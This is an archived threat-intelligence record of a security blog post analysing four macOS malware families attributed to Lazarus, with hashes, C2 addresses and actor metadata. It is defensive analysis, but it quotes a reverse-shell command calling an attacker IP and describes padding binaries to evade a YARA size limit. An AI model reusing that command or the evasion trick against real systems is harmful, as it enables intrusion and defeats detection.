{ "id": "bcddc8cb-8d19-4d6c-9430-f11d611ea311", "created_at": "2026-04-06T00:06:15.422819Z", "updated_at": "2026-04-10T03:38:19.930826Z", "deleted_at": null, "sha1_hash": "e853656e422c21a8f686d9d50e98e4efde51bb8f", "title": "Four Distinct Families of Lazarus Malware Target Apple's macOS Platform", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 9199499, "plain_text": "Four Distinct Families of Lazarus Malware Target Apple's macOS\r\nPlatform\r\nBy Phil Stokes\r\nPublished: 2020-07-27 · Archived: 2026-04-05 14:49:54 UTC\r\nAt the beginning of the year, Kaspersky reported new details of an ongoing campaign they called ‘AppleJeus’,\r\nattributed to North Korean-backed APT group Lazarus and first spotted in 2018. Kaspersky noted that as of\r\nJanuary 2020, the Lazarus group was “currently one of the most active and prolific APT actors”. Since January,\r\nother reports have detailed a macOS RAT (DaclsRAT) and linked it to a wider Lazarus cross-platform toolset\r\n(MATA framework). Since late May 2020, we have observed three other distinct families of macOS malware\r\nlikely from the same actors, most of which have not yet been publicly documented. In this post, we provide a\r\nhigh-level overview of all four of these macOS malware families and detail their variants and evolution so far.\r\n1. Trojanized One-Time Password Apps\r\nThe first of these four families has been covered by other researchers in detail; here we will just summarize the\r\nmain findings for completeness.\r\nFirst seen on 8th April on VirusTotal, the so-called DaclsRAT malware was distributed as a trojanized “One-time-password” (OTP) app called TinkaOTP. The malware embeds a copy of the open-source MinaOTP project as\r\ncover for its malicious activities.\r\nWritten in Swift, the initial observed sample was built on a macOS 10.15.3 (19D76) machine, while a second\r\nversion, compiled the following week on April 1st was built on 10.15.4 (19E266), indicating if nothing else that\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 1 of 14\n\nthe malware authors were vigilant at keeping up with macOS updates on their own machines, whether virtual or\r\nmetal-based.\r\nAs has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the\r\nmost attention contains the malware payload in the application bundle’s Resources folder. The file is a Mach-O\r\nbinary disguised as a .nib file, at ../Resources/Base.lproj/Submenu.nib . This file is copied directly to the users\r\nLibrary folder and renamed as .mina . The dot prefix is added in order to make it invisible in the Finder. This\r\npayload is then executed via a user LaunchAgent at ~/Library/LaunchAgents/com.aex-loop.agent.plist .\r\nThe second version does not carry the payload directly but instead downloads it from a C2 into the same location\r\nas before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded\r\ndownload and execution code are easily visible as they are unencrypted, plain UTF strings in the binary:\r\nThe .mina Mach-O payload itself contains a number of interesting UTF-16 strings that both indicate its purpose\r\nand its C2s.\r\n67.43.239.146:443\r\n185.62.58.207:443\r\nplugin_file\r\nplugin_process\r\n/bin/bash\r\nplugin_reverse_p2p\r\nlogsend\r\nplugin_socks\r\nThe payload’s main() function is fairly succinct and hardcodes both the paths and contents for a LaunchAgent and\r\nLaunchDaemon to achieve persistence:\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 2 of 14\n\nIn an update last week, researchers suggested that the malware contained in the trojanized OTP app was in fact\r\npart of a larger toolkit they named ‘MATA’. Since extensive details of this have already been published, we refer\r\ninterested readers to the earlier work.\r\n2. New Trojanized CryptoTrading Apps\r\nThe second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no\r\nanalysis from researchers, possibly due to its targeted nature and a lack of ITW sightings.\r\nTrojanizing cryptocurrency-related apps is where the AppleJeus story began in 2018, and it seems the group must\r\nhave met with reasonable success as 2020 has seen at least two new attempts, with CoinGoTrade and Cryptoistic.\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 3 of 14\n\nWe were first alerted to CoinGoTrade via a tweet on June 3rd from researcher @ccxsaber. A domain at\r\ncoingotrade.com was set up to lure victims into downloading a fake cryptocurrency app. Although we were not\r\nable to source the app bundle, further investigation on VirusTotal revealed two samples of a malicious Mach-O\r\nbinary that appear to have been the loader:\r\n326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd\r\n4f9d2087fadbf7a321a4fbd8d6770a7ace0e4366949b4cfc8cbeb1e9427c02da\r\nThese two samples are both written in Objective-C rather than Swift, and appear identical save for a single line in\r\nthe main() function, as shown by the following diff:\r\ndiff -y \u003c(otool -tv 326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd) \u003c(otool -tv 4f9\r\n0000000100001adc movl $0x4c4b40, %edi | 0000000100001adc movl $0x1, %edi\r\nThe hardcoded value of 0x4c4b40 is the number of seconds passed to the usleep function and equates to 5\r\nseconds (5000000 microseconds). Given no other changes in the code between the two samples, it can be\r\nsupposed that the second sample, which appeared on VirusTotal 14 days after the first, may have been released as\r\na correction to the first. The cslp() function also causes the code to pause execution for short intervals, so it\r\nmay be that the authors decided the call to usleep was redundant or somehow not producing the results they\r\ndesired.\r\nThe samples embed calls to the following URL:\r\nhttps://coingotrade.com/update_coingotrade.php\r\nand post the following data to the server:\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 4 of 14\n\nUnfortunately, we were not able to retrieve a sample of the payload executed out of\r\n/private/tmp/updatecoingotrade . However, clues to its likely behaviour may perhaps be found in a second\r\ntrojanized cryptotrading app appearing on VirusTotal in early May 2020, called “Cryptoistic”.\r\nUnlike the CoinGoTrade trojan, Cryptoistic is written in Swift, although it contains a great deal of code bridged to\r\nObjective C, perhaps indicating a developer more familiar with the older programming language. Cryptoistic was\r\ncompiled on April 2nd, a day after the second version of TinkaOTP, but on a Mac device (real or virtual machine)\r\nrunning an older version of macOS than the one used for compiling the trojanized OTP apps: in this case, 10.15.2\r\n(19C57).\r\nApple’s 19C57 release build had already been superseded several months earlier at the end of January, so at least\r\nhere the threat actor’s build machine was not being kept up to date.\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 5 of 14\n\nThe main purpose of Cryptoistic appears to be to entrap users into creating a single account with the fake platform\r\nfrom which to manage multiple accounts on legitimate platforms such as kraken.com, huobi.por, and binance.com.\r\nBut perhaps most interesting of all is the hardcoded URL, \"http://applepkg.com/product/new/iContact.pkg\" ,\r\nwhich despite the .pkg suffix, in fact returns a Mach-O payload and drops it at /tmp/.signal_tmp .\r\nThe iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted\r\ncommunications with a C2 server over TCP. Functionality includes sending and receiving files and running\r\ncustom commands such as scanning a directory and deleting files.\r\n3. OSX.Casso | Backdoors Galore\r\nAt the same time as TinkaOTP, CoinGoTrade and Cryptoistic began circulating, so too did a family of lightweight,\r\nbackdoor binaries, written primarily in Objective-C and C and making heavy use of standard C libraries built in to\r\nthe operating system. For convenience, we call these closely-related variants OSX.Casso (the reason will become\r\nclear shortly).\r\nThe first of these appeared on VirusTotal on June 1st with the file name “osxari”.\r\n3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837\r\nSeveral variants followed quickly after:\r\ne63640c53204a59ba59f2c310964149ca3616d79adc40a6c3abd5bf669511756\r\n65cc7663fa5c5665ad5d9c6bec2b6257612f9f0c0ce7e4399e6dc8b464ea88c0\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 6 of 14\n\n035089b4ef4a981f43455ebee7963af9e7502170ca206458f96be668b1e3674a\r\n(UPX PACKED; unpacks to: 85d7379b7b82d6b7868f64203a444a5098c72ed7ccff6d1dbb536389a5be5a9c )\r\nand, later\r\n2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b\r\nThe last of these was uploaded with the filename “cassoosx”. A quick search revealed that there is also a Windows\r\nvariant cassou.exe (hence the name OSX.Casso):\r\n90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b\r\nWhat makes these macOS samples all of a piece can be seen from a diff of their Symbol tables, which are almost\r\nidentical across the range of samples and include heavy use of the built-in libcurl.4.dylib.\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 7 of 14\n\nA diff of the embedded strings also reveals some of the significant differences between the first and most recent of\r\nOSX.Casso samples:\r\ndiff -y \u003c(floss -s osxari) \u003c(floss -s cassoosx) \u003e bash -i \u003e /dev/tcp/160.20.147.253/8443 0\u003c\u00261 2\u003e\u00261\r\n_webident_f | _media_1\r\n_webident_s | _media_2\r\nhttps://fudcitydelivers.com/net.php | https://lastedforcast.com/list.php\r\nhttps://fudcitydelivers.com/net.php | https://lastedforcast.com/list.php\r\nhttps://sctemarkets.com/net.php | https://audiopodcasts.co/verify.php\r\nxdns | darwin\r\n \u003e @_printf\r\nThe samples are almost identical except that “cassoosx” includes a reverse shell and different C2 domains. All of\r\nthe samples except cassoosx are around 32Kb in size, but cassoosx has also been padded with several megabytes\r\nof junk printf calls, quite possibly to beat YARA rules that specify a max file size, such as those seen in the\r\nApple’s static signature scanner XProtect.\r\nHere we see the XProtect YARA rule for OSX.Casso:\r\nrule XProtect_MACOS_b17a97e\r\n{\r\nmeta:\r\ndescription = \"MACOS.b17a97e\"\r\nstrings:\r\n$s1 = { 89 C1 C1 E9 07 48 69 C9 11 08 04 02 48 C1 E9 20 69 C9 80 3F 00 00 F7 D9 }\r\ncondition:\r\nMacho and filesize \u003c 100KB and all of them\r\n}\r\nAlthough the rule’s single $s1 condition will hit on the cassoosx sample, the detection will fail as the binary size is\r\nwell over the maximum 100Kb specified in the condition thanks to the padding:\r\nA further change across OSX.Casso samples can be seen in the hardcoded User Agent strings and the version of\r\nChrome that they denote, with the osxari User Agent encoded as follows:\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 8 of 14\n\n3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/79.0.3945.117 Safari/537.36\r\nand all later samples including cassoosx updated to Chrome 83:\r\n2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/83.0.4103.61 Safari/537.36\r\nThe osxari backdoor is itself an evolution of an older Lazarus-related executable ‘Flash Player’ distributed in the\r\nmalicous Album.app. Here we see the same basic methods and use of libcurl in Album.app’s executable, ‘Flash\r\nPlayer’, but there’s been a few revisions in the 2020 code:\r\n(left: Flash Player; right: osxari):\r\nAfter osxari, all later samples of OSX.Casso begin to include the reverse shell. Unlike the older Flash Player\r\nsample, none include a hardcoded persistence LaunchAgent or LaunchDaemon.\r\n4. Emerging Threats | WatchCat and MediaRemote\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 9 of 14\n\nAs this post was in preparation, an update to Apple’s XProtect signatures late last week revealed yet another\r\nLazarus group Mach-O that differs significantly from those discussed above.\r\nTwo new rules in XProtect identify yet another User Agent string, this time specifying older versions of both\r\nmacOS and Safari:\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2\r\nSafari/605.1.15\r\nThe rules also specify strings for “MediaRemote.app” and “com.apple.watchcat.plist”. Searches on VirusTotal\r\nhave only revealed one sample so far:\r\n3bb96bfaf492782b38985f4bd6b7e7f9dc22c1332b42bb74b16041298fd31f93\r\nDetections have been increasing rapidly over the last 14 days as signature-based solutions have caught up:\r\nAlthough there are some overlaps with the earlier backdoor samples (e.g, the use of “/usr/lib/libcurl.4.dylib”), and\r\nthe trojanized OTP apps (e.g., inclusion of a hardcoded LaunchDaemon), there is also much more to this malware\r\nthat has not been seen in the other samples, including use of a WebShell and an onboard crc32 table.\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 10 of 14\n\nThe symbol table also reveals an old friend from earlier Lazarus campaigns, _MsgTroyInfo.\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 11 of 14\n\nWhile analysis of watchcat is still ongoing and we have yet to see an in-the-wild infection, it’s clear that the\r\nrapid iteration of all these various Lazarus-related malware samples shows the actor is heavily invested in the\r\nmacOS platform.\r\nConclusion\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 12 of 14\n\nAll of the samples reviewed above have appeared in the last eight to ten weeks and are evidence that threat actors\r\nbehind the Lazarus group are pursuing several distinct campaigns, using a variety of technologies, and are\r\nthemselves keeping up-to-date with the Apple platform. These are not actors merely porting Windows malware to\r\nmacOS, but rather Mac-specific developers deeply invested in writing custom malware for Apple’s platform.\r\nPrimarily, the samples we have reviewed here appear to be designed to steal cryptocurrency and maintain\r\nbackdoors into their targets’ devices, but there is clearly much more to be learned about these campaigns. The\r\nSentinelOne Platform protects users against all the samples reviewed in this post. For more information about the\r\nSentinelOne macOS agent, see here.\r\nIOCS \u0026 Samples\r\n899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 TinkaOTP.dmg\r\n326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd CoinGoTradeUpgradeDaemon\r\n4f9d2087fadbf7a321a4fbd8d6770a7ace0e4366949b4cfc8cbeb1e9427c02da CoinGoTradeUpgradeDaemon\r\na61ecbe8a5372c85dcf5d077487f09d01e144128243793d2b97012440dcf106e Cryptoistic Mach-O\r\n8783f6755fd3d478fc58040da03d056f9cad12f199ec4dcd90632c6804e0e643 Cryptoistic.dmg\r\nd91c233b2f1177357387c29d92bd3f29fab7b90760e59a893a0f447ef2cb4715 Album.app.zip\r\n735365ef9aa6cca946cfef9a4b85f68e7f9f03011da0cf5f5ab517a381e40d02 Flash Player\r\n3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837 OSX.Casso (osxari)\r\ne63640c53204a59ba59f2c310964149ca3616d79adc40a6c3abd5bf669511756 OSX.Casso\r\n65cc7663fa5c5665ad5d9c6bec2b6257612f9f0c0ce7e4399e6dc8b464ea88c0 OSX.Casso\r\n035089b4ef4a981f43455ebee7963af9e7502170ca206458f96be668b1e3674a OSX.Casso (packed)\r\n85d7379b7b82d6b7868f64203a444a5098c72ed7ccff6d1dbb536389a5be5a9c OSX.Casso\r\n2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b OSX.Casso (cassoosx)\r\n90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b Casso.exe\r\n3bb96bfaf492782b38985f4bd6b7e7f9dc22c1332b42bb74b16041298fd31f93 watchcat\r\n36683ce8ec4ab6c07330930b523ee0d68b2b410f654a30c70250da890cfbf3c9 iContact\r\n67[.]43.239.146:443\r\n185[.]62.58.207:443\r\n160[.]20.147.253/8443\r\nhxxps[:]//fudcitydelivers[.]com\r\nhxxps[:]//sctemarkets[.]com\r\nhxxps[:]//lastedforcast[.]com\r\nhxxps[:]//audiopodcasts[.]co\r\nhxxps[:]//loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001\r\nhxxp[:]//applepkg[.]com/product/new/iContact.pkg\r\n/tmp/.signal_tmp\r\n/private/tmp/updatecoingotrade\r\n/Library/Application Support/CoinGoTradeService/CoinGoTradeUpgradeDaemon\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 13 of 14\n\nSource: https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nhttps://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA", "Malpedia" ], "references": [ "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" ], "report_names": [ "four-distinct-families-of-lazarus-malware-target-apples-macos-platform" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "544ecd2c-82c9-417c-9d98-d1ae395df964", "created_at": "2025-10-29T02:00:52.035025Z", "updated_at": "2026-04-10T02:00:05.408558Z", "deleted_at": null, "main_name": "AppleJeus", "aliases": [ "AppleJeus", "Gleaming Pisces", "Citrine Sleet", "UNC1720", "UNC4736" ], "source_name": "MITRE:AppleJeus", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433975, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e853656e422c21a8f686d9d50e98e4efde51bb8f.pdf", "text": "https://archive.orkl.eu/e853656e422c21a8f686d9d50e98e4efde51bb8f.txt", "img": "https://archive.orkl.eu/e853656e422c21a8f686d9d50e98e4efde51bb8f.jpg" } }